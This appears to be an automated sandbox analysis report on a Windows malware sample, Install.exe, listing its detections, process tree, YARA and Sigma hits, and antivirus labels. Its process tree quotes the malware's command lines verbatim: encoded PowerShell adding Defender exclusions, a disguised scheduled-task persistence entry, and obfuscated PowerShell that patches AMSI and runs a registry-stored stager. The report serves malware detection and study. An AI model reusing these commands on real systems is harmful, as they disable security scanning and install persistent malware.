

Windows Analysis Report
Install.exe

Overview

General Information

Sample Name: Install.exe
Analysis ID: 597646
MD5: 280bfd5ea1f41586ea0ef60ee44bc8db
SHA1: 57aa866f42bccbaceed938390001148323d033c1
SHA256: a6ca5523fce6a4a43964319c35ecb868186465309e9226ab07c158519a5ef6f9
Tags: exe

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Hooks registry keys query functions (used to hide registry keys)
Uses nslookup.exe to query domains
Encrypted powershell cmdline option found
Allocates memory in foreign processes
Creates files in the system32 config directory
Hooks processes query functions (used to hide processes)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Suspicious Svchost Process
Creates a thread in another existing process (thread injection)
Hooks files or directories query functions (used to hide files and directories)
Uses schtasks.exe or at.exe to add and modify task schedules
Found suspicious powershell code related to unpacking or dynamic code loading
Writes to foreign memory regions
.NET source code references suspicious native API functions
Very long command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Potential dropper URLs found in powershell memory
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
PE file contains sections with non-standard names
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Creates job files (autostart)
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after accessing registry keys)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Suspicious Execution of Powershell with Base64

Classification

  • System is w10x64
  • Install.exe (PID: 6752 cmdline: "C:\Users\user\Desktop\Install.exe" MD5: 280BFD5EA1F41586EA0EF60EE44BC8DB)
    • ChiefKeefofficialnaxyi_crypted(6).exe (PID: 6820 cmdline: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe MD5: D55DC38B4EE6BED2168E74194533C572)
      • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • AppLaunch.exe (PID: 6900 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
    • 34432.exe (PID: 6836 cmdline: C:\Users\user\AppData\Roaming\34432.exe MD5: 04F6704BD3AB97905A497BAF3D7FDB3C)
      • cmd.exe (PID: 7012 cmdline: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 7020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 7048 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
        • powershell.exe (PID: 6856 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" MD5: 95000560239032BC68B4C2FDFCDEF913)
      • nslookup.exe (PID: 7056 cmdline: C:\Windows\System32\nslookup.exe MD5: AF1787F1DBE0053D74FC687E7233F8CE)
      • cmd.exe (PID: 5412 cmdline: cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 1584 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • cmd.exe (PID: 6552 cmdline: cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • chrome.exe (PID: 5460 cmdline: C:\Users\user\AppData\Roaming\Chrome\chrome.exe MD5: 04F6704BD3AB97905A497BAF3D7FDB3C)
          • cmd.exe (PID: 6892 cmdline: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
            • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • powershell.exe (PID: 5728 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
  • powershell.exe (PID: 6372 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 6940 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)" MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 2280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • dllhost.exe (PID: 2324 cmdline: C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9} MD5: 2528137C6745C4EADD87817A1909677E)
      • winlogon.exe (PID: 572 cmdline: winlogon.exe MD5: F9017F2DC455AD373DF036F5817A8870)
      • lsass.exe (PID: 612 cmdline: C:\Windows\system32\lsass.exe MD5: 317340CD278A374BCEF6A30194557227)
      • svchost.exe (PID: 724 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • svchost.exe (PID: 900 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM MD5: 32569E403279B3FD2EDB7EBD036273FA)
      • dwm.exe (PID: 984 cmdline: dwm.exe MD5: 70073A05B2B43FFB7A625708BB29E7C7)
  • chrome.exe (PID: 6564 cmdline: C:\Users\user\AppData\Roaming\Chrome\chrome.exe MD5: 04F6704BD3AB97905A497BAF3D7FDB3C)
    • cmd.exe (PID: 3784 cmdline: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 4916 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup
No configs have been found
Yara matches on dropped files:
Source: C:\Users\user\AppData\Roaming\34432.exe, Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Author: Arnim Rupp, Strings:
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe, Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Author: Arnim Rupp, Strings:
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle
Yara matches on unpacked memory images:
Source: 33.2.chrome.exe.fa0000.0.unpack, Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Author: Arnim Rupp, Strings:
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle
Source: 30.0.chrome.exe.20000.0.unpack, Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Author: Arnim Rupp, Strings:
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle
Source: 30.2.chrome.exe.20000.0.unpack, Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Author: Arnim Rupp, Strings:
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle
Source: 4.0.34432.exe.770000.0.unpack, Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Author: Arnim Rupp, Strings:
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle
Source: 4.2.34432.exe.770000.0.unpack, Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Author: Arnim Rupp, Strings:
  • 0x240fc9:$name: ConfuserEx
  • 0x240951:$compile: AssemblyTitle

System Summary

Source: Process started, Author: Florian Roth, Data: Command: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay, CommandLine: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 2324, ParentProcessName: dllhost.exe, ProcessCommandLine: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay, ProcessId: 724, ProcessName: svchost.exe
Source: DNS query, Author: Brandon George (blog post), Thomas Patzke (rule), Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, QueryName: ip-api.com
Source: Process started, Author: frack113, Data: Command: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA", CommandLine: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7012, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA", ProcessId: 7048, ProcessName: powershell.exe
Source: File created, Author: frack113, Data: EventID: 11, Image: C:\Users\user\Desktop\Install.exe, ProcessId: 6752, TargetFilename: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA", CommandLine: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7012, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA", ProcessId: 7048, ProcessName: powershell.exe
Source: Pipe created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: PipeName: \PSHost.132928152596023668.7048.DefaultAppDomain.powershell



AV Detection

Source: C:\Users\user\AppData\Roaming\34432.exe, Avira: detection malicious, Label: HEUR/AGEN.1221921
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe, Avira: detection malicious, Label: HEUR/AGEN.1221921
Source: Install.exe, Virustotal: Detection: 41%
Source: Install.exe, ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Roaming\34432.exe, Virustotal: Detection: 34%
Source: C:\Users\user\AppData\Roaming\34432.exe, ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe, Virustotal: Detection: 50%
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe, ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\34432.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe, Joe Sandbox ML: detected
Source: 22.0.nslookup.exe.140000000.2.unpack, Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.10.unpack, Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.0.unpack, Avira: Label: TR/Injector.vwktt
Source: 22.0.nslookup.exe.140000000.8.unpack, Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.3.unpack, Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.1.unpack, Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.4.unpack, Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.5.unpack, Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.1.unpack, Avira: Label: RKIT/Agent.avskt
Source: 39.0.dllhost.exe.140000000.8.unpack, Avira: Label: RKIT/Agent.avskt
Source: 22.2.nslookup.exe.140000000.0.unpack, Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.5.unpack, Avira: Label: RKIT/Agent.avskt
Source: 39.2.dllhost.exe.140000000.0.unpack, Avira: Label: RKIT/Agent.avskt
Source: 39.0.dllhost.exe.140000000.12.unpack, Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.6.unpack, Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.0.unpack, Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.10.unpack, Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.6.unpack, Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.12.unpack, Avira: Label: TR/Injector.vwktt
Source: 22.0.nslookup.exe.140000000.3.unpack, Avira: Label: TR/Injector.vwktt
Source: 22.0.nslookup.exe.140000000.4.unpack, Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.2.unpack, Avira: Label: RKIT/Agent.avskt
Source: Install.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Install.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: x64\Release\r77-x64.pdb source: svchost.exe
